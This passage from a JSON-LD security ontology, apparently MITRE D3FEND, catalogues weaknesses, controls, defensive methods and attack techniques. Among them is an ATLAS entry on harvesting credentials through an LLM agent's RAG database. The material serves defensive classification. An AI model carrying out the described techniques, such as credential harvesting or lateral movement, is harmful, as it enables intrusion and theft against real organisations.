      "d3f:kb-mitre-analysis": "This patent describes detecting botnets using heuristic analysis techniques on collected network flows. The heuristic techniques include:\n\n* Identifying suspicious traffic patterns to detect command and control traffic ex. periodically visiting a known malware URL, a host visiting a malware domain twice every 5 hour and 14 minutes (this is a specific pattern for a variant of Swizzor botnets).\n* Identifying non-standard behaviors such as connecting to a non-standard HTTP port for HTTP traffic, visiting a non-existent domain, downloading executable files with non-standard executable file extensions, communicating using HTTP header with a shorter than common length\n* Analyzing visited domain information to identify the following: visiting a domain with a domain name that is longer than a common domain name length, visiting a dynamic DNS domain, visiting a fast-flux domain, and visiting a recently created domain.\n\nA score is determined based on these factors and if the score is over a threshold, a responsive action is performed.",
      "d3f:kb-organization": "Palo Alto Networks Inc",
      "d3f:kb-reference-of": {
        "@id": "d3f:DNSTrafficAnalysis"
      },
      "d3f:kb-reference-title": "Heuristic botnet detection",
      "rdfs:label": "Reference - Heuristic botnet detection - Palo Alto Networks Inc"
    },
    {
      "@id": "d3f:CWE-382",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-382",
      "d3f:definition": "A J2EE application uses System.exit(), which also shuts down its container.",
      "rdfs:label": "J2EE Bad Practices: Use of System.exit()",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-705"
      }
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_AU-2_2",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:control-name": "Event Logging | Selection of Audit Events by Component",
      "d3f:exactly": {
        "@id": "d3f:LocalAccountMonitoring"
      },
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "rdfs:label": "AU-2(2)"
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_AC-2_2",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:broader": {
        "@id": "d3f:AccountLocking"
      },
      "d3f:control-name": "Account Management | Automated Temporary and Emergency Account Management",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "rdfs:label": "AC-2(2)"
    },
    {
      "@id": "skos:altLabel",
      "@type": "owl:AnnotationProperty"
    },
    {
      "@id": "d3f:CWE-208",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-208",
      "d3f:definition": "Two separate operations in a product require different amounts of time to complete, in a way that is observable to an actor and reveals security-relevant information about the state of the product, such as whether a particular operation was successful or not.",
      "rdfs:label": "Observable Timing Discrepancy",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-203"
      }
    },
    {
      "@id": "d3f:SenderMTAReputationAnalysis",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:SenderMTAReputationAnalysis"
      ],
      "d3f:analyzes": {
        "@id": "d3f:Email"
      },
      "d3f:d3fend-id": "D3-SMRA",
      "d3f:definition": "Characterizing the reputation of mail transfer agents (MTA) to determine the security risk in emails.",
      "d3f:kb-article": "## How it works\nThe sender message transfer agent (MTA) trust rating can be considered an indicator of the level of security risk and/or a trust level associated with sender MTAs in an email header.\n\nThe features considered in determining the trust rating may include:\n\n* Length of time MTA has interacted with the enterprise\n* Number of sender domains sending emails from the MTA\n* Number of recipients in the enterprise the MTA sends emails to\n* Number of emails received from this MTA\n* Number of email replies received from this MTA\n\nFor example, higher values for the length of time an MTA has interacted with the enterprise, or number of emails received from an MTA can result in a higher trust rating. The trust rating categorizes the sender MTA as unrated, neutral, trusted, suspicious, or malicious.\n\n## Considerations\nLegitimate emails from a sender MTA may receive a lower trust rating over time if the sender's domain gets spoofed and is used to send unauthorized emails.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-SystemsAndMethodsForDetectingAnd_orHandlingTargetedAttacksInTheEmailChannel_GraphusInc"
      },
      "rdfs:label": "Sender MTA Reputation Analysis",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:MessageAnalysis"
        },
        {
          "@id": "_:N25050577ee984eaab3b6ce0eff1f8a81"
        }
      ]
    },
    {
      "@id": "_:N25050577ee984eaab3b6ce0eff1f8a81",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:analyzes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Email"
      }
    },
    {
      "@id": "d3f:Parameter-basedTransferLearning",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-PBTL",
      "d3f:definition": "The idea behind parameter-based methods is that a well-trained model on the source domain has learned a well-defined structure, and if two tasks are related, this structure can be transferred to the target model.",
      "d3f:kb-article": "## References\nGeorgian Impact Blog. (n.d.). Transfer Learning Part 1. [Link](https://medium.com/georgian-impact-blog/transfer-learning-part-1-ed0c174ad6e7#:~:text=Homogeneous%20Transfer%20Learning-,1.,the%20target%20domain%20for%20training).",
      "rdfs:label": "Parameter-based Transfer Learning",
      "rdfs:subClassOf": {
        "@id": "d3f:HomogenousTransferLearning"
      }
    },
    {
      "@id": "d3f:T1171",
      "@type": "owl:Class",
      "d3f:attack-id": "T1171",
      "d3f:definition": "Link-Local Multicast Name Resolution (LLMNR) and NetBIOS Name Service (NBT-NS) are Microsoft Windows components that serve as alternate methods of host identification. LLMNR is based upon the Domain Name System (DNS) format and allows hosts on the same local link to perform name resolution for other hosts. NBT-NS identifies systems on a local network by their NetBIOS name. (Citation: Wikipedia LLMNR) (Citation: TechNet NetBIOS)",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1557.001",
      "rdfs:label": "LLMNR/NBT-NS Poisoning and Relay",
      "rdfs:seeAlso": {
        "@id": "d3f:T1557.001"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:CredentialAccessTechnique"
      }
    },
    {
      "@id": "d3f:CCI-001262_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system monitors inbound and outbound communications for unusual or unauthorized activities or conditions.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": [
        {
          "@id": "d3f:InboundTrafficFiltering"
        },
        {
          "@id": "d3f:OutboundTrafficFiltering"
        }
      ],
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-22T00:00:00"
      },
      "rdfs:label": "CCI-001262"
    },
    {
      "@id": "d3f:T1438",
      "@type": "owl:Class",
      "d3f:attack-id": "T1438",
      "d3f:definition": "Adversaries may attempt to exfiltrate data over a different network medium than the command and control channel. If the command and control network is a standard Internet connection, the exfiltration may occur, for example, via Bluetooth, or another radio frequency (RF) channel.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1644",
      "rdfs:label": "Exfiltration Over Other Network Medium - ATTACK Mobile",
      "rdfs:seeAlso": {
        "@id": "d3f:T1644"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKMobileCommandAndControlTechnique"
      },
      "skos:prefLabel": "Exfiltration Over Other Network Medium"
    },
    {
      "@id": "d3f:CWE-266",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-266",
      "d3f:definition": "A product incorrectly assigns a privilege to a particular actor, creating an unintended sphere of control for that actor.",
      "rdfs:label": "Incorrect Privilege Assignment",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-269"
      }
    },
    {
      "@id": "d3f:LinuxTime",
      "@type": "owl:Class",
      "d3f:definition": "Get time in seconds.",
      "rdfs:isDefinedBy": {
        "@id": "https://man7.org/linux/man-pages/man2/time.2.html"
      },
      "rdfs:label": "Linux Time",
      "rdfs:subClassOf": {
        "@id": "d3f:OSAPIGetSystemTime"
      }
    },
    {
      "@id": "d3f:CWE-1299",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1299",
      "d3f:definition": "The lack of protections on alternate paths to access control-protected assets (such as unprotected shadow registers and other external facing unguarded interfaces) allows an attacker to bypass existing protections to the asset that are only performed against the primary path.",
      "rdfs:label": "Missing Protection Mechanism for Alternate Hardware Interface",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-288"
        },
        {
          "@id": "d3f:CWE-420"
        }
      ]
    },
    {
      "@id": "d3f:DE-0002",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "DE-0002",
      "d3f:definition": "Threat actors may target ground-side telemetry reception, processing, or display to disrupt the operator’s visibility into spacecraft health and activity. This may involve denial-based attacks that prevent the spacecraft from transmitting telemetry to the ground (e.g., disabling telemetry links or crashing telemetry software), or more subtle deception-based attacks that manipulate telemetry content to conceal unauthorized actions. Since telemetry is the primary method ground controllers rely on to monitor spacecraft status, any disruption or manipulation can delay or prevent detection of malicious activity, suppress automated or manual mitigations, or degrade trust in telemetry-based decision support systems.",
      "d3f:impairs": {
        "@id": "d3f:WirelessLink"
      },
      "rdfs:label": "Disrupt or Deceive Downlink - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/DE-0002/"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:SPARTADefenseEvasionTechnique"
        },
        {
          "@id": "_:N8b4a05def17a451a887ba39195861ee7"
        }
      ],
      "skos:prefLabel": "Disrupt or Deceive Downlink"
    },
    {
      "@id": "_:N8b4a05def17a451a887ba39195861ee7",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:impairs"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:WirelessLink"
      }
    },
    {
      "@id": "d3f:OTCreateDataCommand",
      "@type": "owl:Class",
      "d3f:definition": "OT command that creates data on a remote device.",
      "rdfs:comment": [
        "BACnet: addListElement\nBACnet: createObject",
        "CIP: Insert Member"
      ],
      "rdfs:label": "OT Create Data Command",
      "rdfs:seeAlso": [
        {
          "@id": "https://icscsi.org/library/Documents/ICS_Protocols/Control%20Microsystems%20-%20DNP3%20User%20and%20Reference%20Manual.pdf"
        },
        {
          "@id": "https://modbus.org/docs/Modbus_Application_Protocol_V1_1b3.pdf"
        },
        {
          "@id": "https://nvlpubs.nist.gov/nistpubs/TechnicalNotes/NIST.TN.2023.pdf"
        }
      ],
      "rdfs:subClassOf": {
        "@id": "d3f:OTWriteCommand"
      }
    },
    {
      "@id": "d3f:T1210",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1210",
      "d3f:definition": "Adversaries may exploit remote services to gain unauthorized access to internal systems once inside of a network. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. A common goal for post-compromise exploitation of remote services is for lateral movement to enable access to a remote system.",
      "d3f:may-modify": [
        {
          "@id": "d3f:ProcessCodeSegment"
        },
        {
          "@id": "d3f:ProcessSegment"
        },
        {
          "@id": "d3f:StackFrame"
        }
      ],
      "d3f:produces": {
        "@id": "d3f:IntranetNetworkTraffic"
      },
      "rdfs:label": "Exploitation of Remote Services",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:LateralMovementTechnique"
        },
        {
          "@id": "_:N78c59b5b5b3b4ca4a3cc8ad34c6e7291"
        },
        {
          "@id": "_:N10fa1eefa7214ca089c03a09001baafa"
        },
        {
          "@id": "_:N018d3cd069504698b98bb4fafa9e3fcb"
        },
        {
          "@id": "_:Ncadc281585b8496fb339fe43f7a5d754"
        }
      ]
    },
    {
      "@id": "_:N78c59b5b5b3b4ca4a3cc8ad34c6e7291",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-modify"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ProcessCodeSegment"
      }
    },
    {
      "@id": "_:N10fa1eefa7214ca089c03a09001baafa",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-modify"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ProcessSegment"
      }
    },
    {
      "@id": "_:N018d3cd069504698b98bb4fafa9e3fcb",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-modify"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:StackFrame"
      }
    },
    {
      "@id": "_:Ncadc281585b8496fb339fe43f7a5d754",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:produces"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:IntranetNetworkTraffic"
      }
    },
    {
      "@id": "d3f:valid",
      "@type": "owl:DatatypeProperty",
      "d3f:definition": "Date (often a range) of validity of a resource.",
      "rdfs:label": {
        "@language": "en",
        "@value": "date valid"
      },
      "rdfs:range": {
        "@id": "xsd:dateTime"
      },
      "rdfs:subPropertyOf": {
        "@id": "d3f:date"
      }
    },
    {
      "@id": "d3f:CWE-29",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-29",
      "d3f:definition": "The product uses external input to construct a pathname that should be within a restricted directory, but it does not properly neutralize '\\..\\filename' (leading backslash dot dot) sequences that can resolve to a location that is outside of that directory.",
      "rdfs:label": "Path Traversal: '\\..\\filename'",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-23"
      }
    },
    {
      "@id": "d3f:DataAcquisitionUnit",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "The hardware component which connects to data sources to gather raw, time-stamped data. It often connects to databases or historian gateways for storage and analysis.",
      "d3f:may-contain": {
        "@id": "d3f:DataAcquisitionAgent"
      },
      "rdfs:label": "Data Acquisition Unit",
      "rdfs:seeAlso": {
        "@id": "https://attack.mitre.org/assets/A0009"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:HardwareDevice"
        },
        {
          "@id": "_:Ne448934573274c62b7a2863d0e6d3055"
        }
      ]
    },
    {
      "@id": "_:Ne448934573274c62b7a2863d0e6d3055",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-contain"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:DataAcquisitionAgent"
      }
    },
    {
      "@id": "d3f:ReadMemory",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:reads": {
        "@id": "d3f:MemoryBlock"
      },
      "rdfs:label": "Read Memory",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:SystemCall"
        },
        {
          "@id": "_:N17c2dcd1cefb4528932d0a210df3904f"
        }
      ]
    },
    {
      "@id": "_:N17c2dcd1cefb4528932d0a210df3904f",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:reads"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:MemoryBlock"
      }
    },
    {
      "@id": "d3f:CWE-183",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-183",
      "d3f:definition": "The product implements a protection mechanism that relies on a list of inputs (or properties of inputs) that are explicitly allowed by policy because the inputs are assumed to be safe, but the list is too permissive - that is, it allows an input that is unsafe, leading to resultant weaknesses.",
      "d3f:synonym": [
        "Allowlist / Allow List",
        "Safelist / Safe List",
        "Whitelist / White List"
      ],
      "rdfs:label": "Permissive List of Allowed Inputs",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-697"
      }
    },
    {
      "@id": "d3f:AML.T0082",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0082",
      "d3f:definition": "Adversaries may attempt to use their access to a large language model (LLM) on the victim's system to collect credentials. Credentials may be stored in internal documents which can inadvertently be ingested into a RAG database, where they can ultimately be retrieved by an AI agent.",
      "rdfs:label": "RAG Credential Harvesting - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0082"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ATLASCredentialAccessTechnique"
      },
      "skos:prefLabel": "RAG Credential Harvesting"
    },
    {
      "@id": "d3f:Reference-LLVMControlFlowIntegrity",
      "@type": [
        "owl:NamedIndividual",
        "d3f:SpecificationReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://clang.llvm.org/docs/ControlFlowIntegrity.html"
      },
      "d3f:kb-organization": "clang.org",
      "d3f:kb-reference-of": {
        "@id": "d3f:ControlFlowIntegrity"
      },
      "d3f:kb-reference-title": "Control Flow Integrity",
      "rdfs:label": "Reference - Clang/LLVM - Control Flow Integrity (CFI)"
    },
    {
      "@id": "d3f:OTSetTimeCommand",
      "@type": "owl:Class",
      "d3f:definition": "Set timing mechanisms.",
      "rdfs:label": "OT Set Time Command",
      "rdfs:seeAlso": [
        {
          "@id": "https://icscsi.org/library/Documents/ICS_Protocols/Control%20Microsystems%20-%20DNP3%20User%20and%20Reference%20Manual.pdf"
        },
        {
          "@id": "https://modbus.org/docs/Modbus_Application_Protocol_V1_1b3.pdf"
        },
        {
          "@id": "https://nvlpubs.nist.gov/nistpubs/TechnicalNotes/NIST.TN.2023.pdf"
        }
      ],
      "rdfs:subClassOf": {
        "@id": "d3f:OTTimeCommand"
      }
    },
    {
      "@id": "d3f:MessageAuthentication",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:MessageAuthentication"
      ],
      "d3f:authenticates": {
        "@id": "d3f:DigitalMessage"
      },
      "d3f:d3fend-id": "D3-MAN",
      "d3f:definition": "Authenticating the sender of a message and ensuring message integrity.",
      "d3f:kb-article": "## How it works\n\n### Digital Signature\nDigital signatures are used to verify that a message is from the expected sender. In email, the Secure/Multipurpose Internet Mail Extensions (S/MIME) protocol is typically used to digitally sign messages. A hash value of the sender's message is created and encrypted with the sender's private key to create a digital signature. The message and the digital signature are sent to the recipient, where the sender's public key is used to decrypt the digital signature and the hash of the received message is computed. The computed hash is compared with the hash recovered from the signature, and any difference in the hash values signifies that the message did not originate from the sender or has been altered in transit.\n\n### Message Authentication Code (MAC)\nMAC is a fixed-size string that is appended to a message to provide message authentication and integrity. The sender MAC signing algorithm takes as input a secret symmetric key shared between sender and recipient and the message to calculate a short tag that is appended to the message. The recipient receives the message with the appended tag, and a MAC verification algorithm is run using the symmetric key to verify the message came from the stated sender and ensure the message has not been tampered with.\n\n## Considerations\n- Public keys associated with digital signatures should be verified by a Certification Authority (CA) to prevent impersonation. The CA verifies the owner of a public key and puts the sender's identity and public key into a certificate that is signed by the CA.\n- Digital signatures provide non-repudiation where a third party can verify the authenticity of the message using the sender's digital certificate signed by the CA.\n- Symmetric keys must be exchanged securely via a private channel and management of new symmetric keys is needed for each pair of participants wishing to exchange messages.",
      "d3f:kb-reference": [
        {
          "@id": "d3f:Reference-DomainKeysIdentifiedMail-Signatures-IETF"
        },
        {
          "@id": "d3f:Reference-SecureMultipurposeInternetMailExtensionsMIME-Version3.1"
        }
      ],
      "rdfs:label": "Message Authentication",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:MessageHardening"
        },
        {
          "@id": "_:N2b6e873ad5e2427d8c0204c3dd015587"
        }
      ]
    },
    {
      "@id": "_:N2b6e873ad5e2427d8c0204c3dd015587",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:authenticates"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:DigitalMessage"
      }
    },
    {
      "@id": "d3f:ExecutableDenylisting",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:ExecutableDenylisting"
      ],
      "d3f:blocks": {
        "@id": "d3f:ExecutableFile"
      },
      "d3f:d3fend-id": "D3-EDL",
      "d3f:definition": "Blocking the execution of files on a host in accordance with defined application policy rules.",
      "d3f:filters": {
        "@id": "d3f:CreateProcess"
      },
      "d3f:kb-article": "## How it works\n\n#### Criteria\n\nA policy-enforcing application can register an application for denylisting based on conditions including the following:\n\n* File attributes\n    * file name\n    * file path\n    * file hash\n    * file publisher, as obtained from the digital signature\n    * permissions of the file\n* File malware scan (e.g., Windows SmartScreen)\n* User-File combination\n\nThis may be done to prevent execution of applications which are:\n\n* an old version with known vulnerabilities\n* without a valid license, which could cause legal issues\n* in a directory that is accessible to low-privileged users, that could be accessed by a malware dropper\n* known trojan horse programs\n* too open in their permissions, possibly set to run as a user other than the originator or allowing execution when they should not be\n* a match to the hash of other known malware\n* detected as undesirable based on a file scan or runtime behavior\n\nSystem administrators will customize the rules for the given environment.\n\n#### Backend\n\nThe policy-enforcing program may work by running in kernel mode, and [intercepting] [system calls which execute a process].\n\n## Considerations\n\n* If denylisting is done by filename, filepath, or hash, these mechanisms may be a worthy first line of defense and detection, but could still be evaded by an attacker.\n* Continuous management is needed to keep the denylist up to date, whether it is based on hash, publisher, behavior, or any other digital artifact.\n* Although denylists based on attributes such as file path and virus scan could defend against some threats which they have not been explicitly coded to block, denylists may not provide protection from new, unknown, or zero-day attacks.\n\n\n## Examples\nOn a Windows machine the Windows Defender Application Control (WDAC) policy enforcement is run in the kernel and allows for restricting applications.",
      "d3f:kb-reference": [
        {
          "@id": "d3f:Reference-MethodAndApparatusForIncreasingTheSpeedAtWhichComputerVirusesAreDetected_McAfeeLLC"
        },
        {
          "@id": "d3f:Reference-ContentExtractorAndAnalysisSystem_Bit9Inc,CarbonBlackInc"
        }
      ],
      "d3f:synonym": "Executable Blacklisting",
      "rdfs:label": "Executable Denylisting",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ExecutionIsolation"
        },
        {
          "@id": "_:Ne0805661d0804100825d1df159f8617e"
        },
        {
          "@id": "_:N5cffa015e29e409595a8e6e4b2d1e7ec"
        }
      ]
    },
    {
      "@id": "_:Ne0805661d0804100825d1df159f8617e",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:blocks"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ExecutableFile"
      }
    },
    {
      "@id": "_:N5cffa015e29e409595a8e6e4b2d1e7ec",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:filters"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:CreateProcess"
      }
    },
    {
      "@id": "d3f:CWE-600",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-600",
      "d3f:definition": "The Servlet does not catch all exceptions, which may reveal sensitive debugging information.",
      "d3f:synonym": "Missing Catch Block",
      "rdfs:label": "Uncaught Exception in Servlet",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-248"
      }
    },
    {
      "@id": "d3f:T1608.003",
      "@type": "owl:Class",
      "d3f:attack-id": "T1608.003",
      "d3f:definition": "Adversaries may install SSL/TLS certificates that can be used during targeting. SSL/TLS certificates are files that can be installed on servers to enable secure communications between systems. Digital certificates include information about the key, information about its owner's identity, and the digital signature of an entity that has verified the certificate's contents are correct. If the signature is valid, and the person examining the certificate trusts the signer, then they know they can use that key to communicate securely with its owner. Certificates can be uploaded to a server, then the server can be configured to use the certificate to enable encrypted communication with it.(Citation: DigiCert Install SSL Cert)",
      "rdfs:label": "Install Digital Certificate",
      "rdfs:subClassOf": {
        "@id": "d3f:T1608"
      }
    },
    {
      "@id": "d3f:T1554",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1554",
      "d3f:definition": "Adversaries may modify host software binaries to establish persistent access to systems. Software binaries/executables provide a wide range of system commands or services, programs, and libraries. Common software binaries are SSH clients, FTP clients, email clients, web browsers, and many other user or server applications.",
      "d3f:modifies": {
        "@id": "d3f:ClientApplication"
      },
      "rdfs:label": "Compromise Host Software Binary",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:PersistenceTechnique"
        },
        {
          "@id": "_:N4234ad58e17b460a9e2b780c2e2d7987"
        }
      ]
    },
    {
      "@id": "_:N4234ad58e17b460a9e2b780c2e2d7987",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ClientApplication"
      }
    },
    {
      "@id": "d3f:BusNetworkFrame",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:contained-by": {
        "@id": "d3f:BusNetworkTraffic"
      },
      "d3f:contains": {
        "@id": "d3f:BusMessage"
      },
      "d3f:definition": "A network frame whose layout and timing follow a bus protocol, allowing data to be exchanged across the shared bus medium.",
      "rdfs:label": "Bus Network Frame",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:NetworkFrame"
        },
        {
          "@id": "_:N37ad1cc9173746bba442b390c678ae5f"
        },
        {
          "@id": "_:N04ec27b3cbdc47a4b21a35d5679ea761"
        }
      ],
      "skos:altLabel": "Bus Frame"
    },
    {
      "@id": "_:N37ad1cc9173746bba442b390c678ae5f",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contained-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:BusNetworkTraffic"
      }
    },
    {
      "@id": "_:N04ec27b3cbdc47a4b21a35d5679ea761",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contains"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:BusMessage"
      }
    },
    {
      "@id": "d3f:Image-to-ImageTranslationGAN",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-ITITG",
      "d3f:definition": "Image-to-image translation is the task of transferring styles and characteristics from one image domain to another.",
      "d3f:kb-article": "## References\nMathWorks. (n.d.). Get Started with GANs for Image-to-Image Translation. [Link](https://www.mathworks.com/help/images/get-started-with-gans-for-image-to-image-translation.html)",
      "rdfs:label": "Image-to-Image Translation GAN",
      "rdfs:subClassOf": {
        "@id": "d3f:GenerativeAdversarialNetwork"
      }
    },
    {
      "@id": "d3f:Reference-IntroducingFirefoxNewSiteIsolationArchitecture",
      "@type": [
        "owl:NamedIndividual",
        "d3f:InternetArticleReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://hacks.mozilla.org/2021/05/introducing-firefox-new-site-isolation-security-architecture/"
      },
      "d3f:kb-abstract": "",
      "d3f:kb-author": "Anny Gakhokidze",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "Mozilla Foundation",
      "d3f:kb-reference-of": {
        "@id": "d3f:Application-basedProcessIsolation"
      },
      "d3f:kb-reference-title": "Site Isolation Design Document",
      "d3f:release-date": "May 18, 2021",
      "rdfs:label": "Reference - Introducing Firefox's new Site Isolation Architecture"
    },
    {
      "@id": "d3f:OTDiagnosticsMessage",
      "@type": "owl:Class",
      "d3f:definition": "Relay error, exception, alarm, or log information.",
      "rdfs:label": "OT Diagnostics Message",
      "rdfs:seeAlso": [
        {
          "@id": "https://icscsi.org/library/Documents/ICS_Protocols/Control%20Microsystems%20-%20DNP3%20User%20and%20Reference%20Manual.pdf"
        },
        {
          "@id": "https://modbus.org/docs/Modbus_Application_Protocol_V1_1b3.pdf"
        },
        {
          "@id": "https://nvlpubs.nist.gov/nistpubs/TechnicalNotes/NIST.TN.2023.pdf"
        }
      ],
      "rdfs:subClassOf": {
        "@id": "d3f:OTProtocolMessage"
      }
    },
    {
      "@id": "d3f:Reference-ONVIF-ProfileS",
      "@type": [
        "owl:NamedIndividual",
        "d3f:SpecificationReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://www.onvif.org/profiles/profile-s/"
      },
      "d3f:kb-abstract": "Profile S specifies common interfaces for streaming video, PTZ, and related functions in IP-based video systems.",
      "d3f:kb-author": "ONVIF",
      "d3f:kb-reference-of": {
        "@id": "d3f:VideoSurveillance"
      },
      "d3f:kb-reference-title": "ONVIF Profile S Specification",
      "rdfs:label": "Reference - ONVIF Profile S"
    },
    {
      "@id": "d3f:CCI-002824_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:broader": [
        {
          "@id": "d3f:DeadCodeElimination"
        },
        {
          "@id": "d3f:ProcessSegmentExecutionPrevention"
        },
        {
          "@id": "d3f:SegmentAddressOffsetRandomization"
        },
        {
          "@id": "d3f:StackFrameCanaryValidation"
        }
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system implements organization-defined security safeguards to protect its memory from unauthorized code execution.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-07-12T00:00:00"
      },
      "rdfs:label": "CCI-002824"
    },
    {
      "@id": "d3f:RD-0002",
      "@type": "owl:Class",
      "d3f:attack-id": "RD-0002",
      "d3f:definition": "Rather than purchasing or renting assets, adversaries compromise existing infrastructure, mission-owned, third-party, or shared, to obtain ready-made reach into space, ground, or cloud environments with the benefit of plausible attribution. Targets range from physical RF chains and timing sources to mission control servers, automation/scheduling systems, SLE/CSP gateways, identity providers, and cloud data paths. Initial access often comes via stolen credentials, spear-phishing of operators and vendors, exposed remote-support paths, misconfigured multi-tenant platforms, or lateral movement from enterprise IT into operations enclaves. Once resident, actors can pre-position tools, modify configurations, suppress logging, and impersonate legitimate stations or operators to support later Execution, Exfiltration, or Denial.",
      "rdfs:label": "Compromise Infrastructure - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/RD-0002/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:SPARTAResourceDevelopmentTechnique"
      },
      "skos:prefLabel": "Compromise Infrastructure"
    },
    {
      "@id": "d3f:CWE-1301",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1301",
      "d3f:definition": "The product's data removal process does not completely delete all data and potentially sensitive information within hardware components.",
      "rdfs:label": "Insufficient or Incomplete Data Removal within Hardware Component",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-226"
      }
    },
    {
      "@id": "d3f:T0888",
      "@type": "owl:Class",
      "d3f:attack-id": "T0888",
